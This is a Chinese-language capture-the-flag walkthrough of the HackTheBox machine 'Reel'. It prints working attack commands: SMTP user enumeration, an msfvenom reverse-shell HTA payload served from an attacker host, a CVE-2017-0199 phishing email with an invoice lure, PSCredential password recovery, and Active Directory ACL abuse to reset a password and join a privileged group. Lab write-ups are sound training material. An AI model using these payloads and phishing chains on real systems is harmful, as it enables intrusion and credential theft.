HTB靶机渗透系列之Reel

	Reel是一个困难的靶机，知识点涉及smtp用户名枚举、rtf邮件钓鱼、xml凭据恢复、管理员组添加等感兴趣 的同学可以在HackTheBox中进行学习。 通关思维导图 0x01 侦查 端口探测 首先通过nmap对目标进行端口扫描 nmap -Pn -p- -sV -sC -A 10.10.10.77 -oA nmap_Reel 扫描结果显示目标开放了21、22、25端口 21端口 利用匿名登录漏洞可直接登陆目标 FTP 服务 ftp 10.10.10.77 ## 账号/密码：anonymous/anonymous ftp信息收集 进入documents目录并尝试下载所有文件 ftp > cd documents ftp > ls ftp > get readme.txt ftp > get AppLocker.docx ftp > get "Windows Event Forwarding.docx" 经翻译后三个文件内容分别如下： AppLocker.docx：要记录的 AppLocker 程序 - exe、msi 和脚本（ps1、vbs、cmd、bat、js）的哈希规则有效 readme.txt：请给我发电子邮件任何 rtf 格式程序 - 我会审查和转换。新格式/转换后的文件将保存在这里 Windows Event Forwarding.docx：记录了日志转发命令 使用 exiftool 分别查看元数据，在文档Windows Event Forwarding.docx中发 现邮箱地址nico@megabank.com exiftool "Windows Event Forwarding.docx" 0x02 上线[nico] smtp用户名枚举 目标存在 smtp 服务，因此可尝试通过用户枚举来获取邮箱用户。枚举 smtp 用户存在以下三种模式： VERY：验证邮箱是否存在 EXPN：验证邮箱列表是否存在 RCPT TO：指定收件人地址 手动枚举 验证发现的邮箱账户nico@megabank.com，使用vrfy、expn命令查询该账户失败 telnet 10.10.10.77 25 > HELO > HELO mac > VRFY nico@megabank.com > EXPN nico@megabank.com 而使用rcpt to命令验证显示该账户存在 > mali from a@abc.com > rcpt to:nico@megabank.com > rcpt to:root@aaa.com > rcpt to:a@megabank.com > rcpt to:root@megabank.com 自动枚举 使用自动化的 SMTP 用户名枚举工具能够极大地提升效率，当然前提是要存在相应的字典文件，通过对nico @htb、@megabank这几个关键变量进行变形后构造用户名字典user.txt如下： reel administrator admin root reel@htb reel@htb.local reel@reel.htb administrator@htb admin@htb root@htb sadfasdfasdfasdf@htb nico@megabank.com htb@metabank.com 使用 smtp-user-enum 对用户名仅需部分自动枚举，结果显示只有@htb账户和目标邮箱账户 nico@megabank.com都存在。 smtp-user-enum -M RCPT -U user.txt -t 10.10.10.77 邮件钓鱼 在readme.txt中提示可发送 rtf 格式的文件，而利用 rtf 可执行 RCE 漏洞（CVE-2017-0199） 漏洞详细利用步骤如下： 1、向目标用户发送恶意的 rtf 文件 2、在易受攻击的 word 版本中打开该文件将导致代码执行，恶意代码存在于 olelink 对象中 3、当打开文档后 winword.exe 会向远程服务器发送 http 请求以检索恶意的 HTA 文件 4、收到响应的则是一个带有恶意脚本的假的 rtf 文件，winword.exe 通过 COM 对象查找 application/hta 的文件处理程序 5、导致 Microsoft HTA 应用程序（mshta.exe）下载并执行包含 Powershell 命令的 Visual Basic 脚本 简单来说就是向目标发送带有恶意 rtf 的邮件，用户一旦打开 rtf 文件后就会加载远程的恶意 hta文件处 理程序并执行相应命令。 生成恶意hta文件 使用 msf 生成 hta 类型的反弹shell木马 msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.17 lport=2222 -f hta-psh -o msfv.hta 生成请求恶意hta的rtf文件 使用 github 上的漏洞利用工具来生成 rtf 文件，该工具的相关命令参数如下： 工具地址：https://github.com/bhdresh/CVE-2017-0199 成功生成用于请求远程 hta 程序的 rtf 文件 python cve-2017-0199_toolkit.py -M gen -w mac.rtf -u http://10.10.14.17/msfv.hta -t rtf -x 0 使用 python 开启 http 服务 python -m SimpleHTTPServer 80 同时监听 2222 端口用于接收反弹shell nc -nvlp 2222 发送邮件获取权限 通过 sendemail 向目标邮件账户发送带有恶意 rtf 文件的邮件，等待用户打开邮件 sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a mac.rtf -s 10.10.10.77 -v 过一段时间后成功拿到反弹shell 在当前用户桌面上成功拿到第一个flag dir c:\Users\nico\Desktop type c:\Users\nico\Desktop\user.txt msf利用 当然也可以使用 MSF 来完成以上操作 msfconsole msf > use exploit/windows/fileformat/office_word_hta msf > set lhost 10.10.14.17 msf > set lport 4444 msf > set srvhost 10.10.14.17 msf > run 向目标用户发送钓鱼邮件 sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v 成功收到 meterpreter 0x03 权限提升[tom] 凭据恢复 在当前用户桌面上发现敏感文件cred.xml，该文件是 PSCredential 对象当中Export-CliXml方法输出的 XML文档，而 PSCredential 对象在 Powershell 中主要用于存储用户名、密码和凭据 type c:\Users\nico\Desktop\cred.xml 使用 PSCredential 对象中的Import-CliXml方法导入该文件，调用GetNetworkCredential方法可从中直接 提取明文密码，成功拿到账号密码Tom/1ts-mag1c!!! powershell -c "$cred = Import-CliXml -Path c:\Users\nico\Desktop\cred.xml;$cr ed.GetNetworkCredential() | Format-List *" ssh登录 使用拿到的账号密码登录目标 SSH 服务 ssh tom@10.10.10.77 进入该用户桌面后在AD Audit\BloodHound\Ingestors目录中找到acls.csv文件 cd "C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors" dir 0x04 权限提升[claire] csv信息收集 在本地搭建 SMB 服务用于文件传输 python3 smbserver.py mac ~/hackthebox/Machines/Reel 利用 SMB 协议下载该文件到本地 copy acls.csv \\10.10.14.17\mac 打开 csv 表格文件后发现其中包含了域中各个用户以及用户组之间的关系 经搜索后发现当前用户tom对用户claire拥有WriteOwner权限 用户claire又对Backup_Admins组对象拥有WriteDacl权限，因此拥有用户tom的权限就可以控制用户claire 并最终拿到Backup_Admins用户组权限 BloodHound表格分析 BloodHound 可对大型域环境进行分析并将其可视化输出，如果未安装可使用以下命令进行安装 apt install bloodhound 安装完后开启 neo4j 数据库，如果出现以下报错 出现报错创建log目录和对应日志neo4j.log mkdir /usr/share/neo4j/logs touch /usr/share/neo4j/logs/neo4j.log 再次开启 neo4j 数据库 neo4j start 使用默认账号密码登录 BloodHound username: neo4j password: neo4j 首次登录需要重新设置密码。在其中上传数据可寻找域内各个用户、用户组的对应关系 修改claire用户密码 导入 PowerSploit 中的powerview.ps1 powershell //切换到powershell命令行 . .\PowerView.ps1 //将PowerView导入 把当前用户tom设置为claire用户的 ACL 的所有者并授予其修改密码的权限 Set-DomainObjectOwner -identity claire -OwnerIdentity tom Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 设置claire的密码为MagicMac123!@# $cred = ConvertTo-SecureString "MagicMac123!@#" -AsPlainText -force Set-DomainUserPassword -identity claire -accountpassword $cred ssh登陆 使用重新设置的密码登录用户claire ssh claire@10.10.10.17 查看backup_admins组成员，目前该组中只有ranj用户 net group backup_admins 成功将claire用户添加到backup_admins用户组下，不过需重新登录，否则无法生效 net group backup_admins claire /add net group backup_admins 0x05 权限提升[administrator] 信息收集 查看当前用户对管理员目录c:\users\administrator的权限，发现Backup_Admins组对管理 员目录拥有访问权限 icalcs Administrator 因此可直接查看管理员用户桌面中的文件，成功发现第二个 flag cd c:\Users\Administrator\Desktop ls 但尝试查看root.txt却被拒绝 type root.txt 管理员登陆 在备份目录Backup Scripts中遍历密码，成功找到管理员密码Cr4ckMeIfYouC4n! cd "Back Scripts" type * | findstr pass 通过该密码可成功登录管理员并拿到第二个flag ssh administrator@10.10.10.77 0x06 总结 Reel 译为卷轴，它是目前唯一一个需要三次提权的靶机。通过信息收集发现目标存在 FTP 匿名登录漏洞 利用该漏洞登录 FTP 后下载其中的文件，分析 Word 文档的源数据时成功找到一个邮箱账户nico@megabank.com，经 SMTP 用户名枚 举验证后可知该邮箱账户存在，与此同时 FTP 中的文件还提示可接受 rtf 格式的邮件，因此可将带有恶意 rtf 的钓鱼邮件 发送给该邮箱账户。 等待受害者点击后可成功获取用户nico的权限。在该用户桌面上发现用户tom的账号密码凭据，但其中的密码为密文借助 GetNetworkCredential 方法可恢复为密码明文。有了tom的密码后就能够以tom的身份登陆ssh，搜索后发现在该用户 桌面上存在反映域内用户与用户组关系的表格，其中显示用户tom对用户claire拥有WriteOwner权限，而用户claire对 Backup_Admins组拥有WriteDacl权限。 利用 PowerView 工具可配合用户tom的权限修改用户claire密码，使用修改后的密码可成功登录用户claire，登陆成功后将 当前用户添加至Backup_Admins用户组当中，而该用户组拥有管理员桌面的访问权限，尝试读取 flag 信息失败，但可读取 备份目录中的管理员密码，并最终使用该密码登陆管理员成功。